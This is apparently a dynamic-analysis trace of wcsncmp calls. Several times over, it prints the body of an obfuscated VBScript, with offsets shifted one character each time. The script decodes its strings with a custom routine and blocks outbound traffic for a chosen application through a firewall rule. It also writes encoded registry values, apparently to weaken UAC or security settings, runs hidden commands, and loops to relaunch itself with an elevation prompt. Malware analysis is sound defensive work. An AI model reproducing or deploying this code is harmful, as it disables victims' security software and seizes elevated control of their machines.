bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0222.962] wcsncmp (_String1="r((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.962] wcsncmp (_String1="((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.962] wcsncmp (_String1="(asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.962] wcsncmp (_String1="asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 